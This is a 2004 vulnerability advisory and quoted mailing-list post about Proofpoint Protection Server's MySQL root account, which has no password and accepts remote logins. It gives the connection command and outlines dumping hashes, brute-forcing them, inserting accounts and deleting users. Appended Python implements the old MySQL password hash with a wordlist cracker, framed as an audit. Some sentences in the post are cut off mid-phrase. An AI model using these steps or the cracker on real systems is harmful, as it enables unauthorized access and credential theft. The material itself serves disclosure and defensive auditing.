Proofpoint Protection Server Grants Remote Users Access to the Underlying Database
SecurityTracker Alert ID: 1009175
SecurityTracker URL: http://securitytracker.com/id/1009175
Date: Feb 23 2004
User access via network
Exploit Included: Yes
A vulnerability was reported in the Proofpoint Protection Server. A remote user can gain access to the underlying database server.
It is reported that by default, the system configures the included MySQL database to listen on TCP port 3306 and does not set any password for the 'root' account. A remote user can connect to the database as the 'root' user from any host. This level of privilege allows the remote user to execute INSERT and DELETE commands and to view the contents of the database, the report said.
A remote user can access the underlying database, view the database contents (including stored password hashes), and add new user accounts.
No solution was available at the time of this entry.
Vendor URL: www.proofpoint.com/product-mps/overview.php
Linux (Red Hat Linux)
Source Message Contents
Date: Sat, 21 Feb 2004 19:09:10 -0800
Subject: [Full-Disclosure] Proofpoint Protection Server remote MySQL root user vulnerability
Product: Protection Server
Version: unknown/Red Hat Linux
The MySQL server may be remotely accessed by the "root" user without using
The Proofpoint Protection Server is a software product to filter spam
and other e-mail traffic. It's installed on Red Hat Linux. A partial
customer list may be found on their website.
By default, the embedded MySQL 4.0 server binds to the default port (3306/tcp)
on every IP. The software has no packet filtering or port restrictions
of its own, so all bound ports are wide open to the network.
The specific flaw is that the "root" user in MySQL is not restricted
from connecting from any host ('%') and additionally the root user HAS
NO PASSWORD. There are a few minor restrictions on the root user when
logging in from a remote host, such as no Reload_priv (more on this later),
but basic functions like INSERT and DELETE are allowed.
Exploiting this is as easy as
$ mysql -u root -h a.b.c.d
From there you can view contents of the different databases, including
dumping the hashed passwords for any of the password-protected users.
You can then run one of the brute-force MySQL password hash crackers
against them (it's the old-style 16byte hashes).
It is also possible to create new users indirectly by INSERT'ing into
the user table for database mysql. Remote root will not be able to FLUSH
PRIVILEGES (required to make the user active--this is because no Reload_priv),
but if the database is restarted for any reason those users will become
active and able to authenticate. Remote root also has the ability to
More destructive operations were not tested due to the accidental nature
of discovery, but use your imagination (certainly a DoS is possible simply
by deleting users required by the system). Also since the systems are
running on Red Hat, it may be possible to exploit one of several recent
vulnerabilities in the Linux 2.4 kernel through MySQL.
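The two steps the post describes, connecting as the unpassworded root account that MySQL allows in from any host ('%'), and then cracking the old-style 16-byte hashes dumped from the mysql.user table, can be checked offline against a copy of that table. The Python below is an added example, not code from the advisory, the original poster or Proofpoint: the mysql.user rows, account names and wordlist are constructed sample data, and the hash routine is the pre-4.1 OLD_PASSWORD() algorithm that MySQL 4.0 stores in the Password column.

```python
# Added example, not code from the advisory, the Full-Disclosure post or Proofpoint.
# Audits a dump of MySQL's mysql.user table for the conditions the post describes:
# root reachable from any host ('%') with no password, anonymous accounts, and
# pre-4.1 16-hex-digit hashes weak enough to crack with a wordlist.
from typing import Iterable, List, Tuple

UserRow = Tuple[str, str, str]  # (User, Host, Password) as returned from mysql.user


def old_password(password: str) -> str:
    """MySQL pre-4.1 OLD_PASSWORD() hash: two 31-bit words printed as 16 hex digits.

    Only the low 31 bits of each word survive, and every operation used (add, xor,
    multiply, shift-left) lets low bits depend only on low bits, so masking to 32
    bits per step reproduces the C original regardless of its word size.
    """
    nr, add, nr2 = 1345345333, 7, 0x12345671
    for ch in password:
        if ch in " \t":  # the original algorithm skips spaces and tabs
            continue
        tmp = ord(ch)
        nr ^= ((((nr & 63) + add) * tmp) + (nr << 8)) & 0xFFFFFFFF
        nr2 = (nr2 + ((nr2 << 8) ^ nr)) & 0xFFFFFFFF
        add += tmp
    return "%08x%08x" % (nr & 0x7FFFFFFF, nr2 & 0x7FFFFFFF)


# Constructed sample of `SELECT User, Host, Password FROM mysql.user`; the account
# names are hypothetical and do not come from the advisory.
SAMPLE_USER_TABLE: List[UserRow] = [
    ("root", "localhost", ""),
    ("root", "%", ""),  # the advisory's condition: remote root, no password
    ("", "localhost", ""),  # anonymous account
    ("mailfilter", "localhost", "378b243e220ca493"),  # OLD_PASSWORD('test')
    ("reporting", "%", old_password("correct horse battery staple")),
]

# Constructed wordlist; a real run would use a proper dictionary.
WORDLIST = ["password", "changeme", "test", "mysql", "admin"]


def remote_root_exposed(rows: Iterable[UserRow]) -> bool:
    """True when the exact misconfiguration in the advisory is present."""
    return any(u == "root" and h == "%" and p == "" for u, h, p in rows)


def audit_user_table(rows: Iterable[UserRow], wordlist: Iterable[str]) -> List[Tuple[str, str, str]]:
    """Return (user, host, finding) for every row a remote attacker could abuse."""
    words = list(wordlist)
    findings: List[Tuple[str, str, str]] = []
    for user, host, pw_hash in rows:
        if pw_hash == "":
            kind = "anonymous account, no password" if user == "" else "no password"
            if host == "%":
                kind += ", reachable from any host"
            findings.append((user, host, kind))
        elif len(pw_hash) != 16:
            findings.append((user, host, "not a pre-4.1 hash, skipped"))
        else:
            # The old scheme is unsalted, so one hash per guess covers every
            # account at once; a precomputed table would be faster still.
            for guess in words:
                if old_password(guess) == pw_hash:
                    findings.append((user, host, "cracked: %r" % guess))
                    break
    return findings


if __name__ == "__main__":
    print("remote root@'%' without password:", remote_root_exposed(SAMPLE_USER_TABLE))
    for user, host, finding in audit_user_table(SAMPLE_USER_TABLE, WORDLIST):
        print("%-12s %-10s %s" % (user or "(anonymous)", host, finding))
```

Against a live appliance the input rows are exactly what the post's `mysql -u root -h a.b.c.d` session yields from `SELECT User, Host, Password FROM mysql.user`; the same audit is also the check to re-run after setting a root password and removing the root@'%' row, since a `Password` column that is still empty on any root row means the listener on 3306/tcp is still open to everyone.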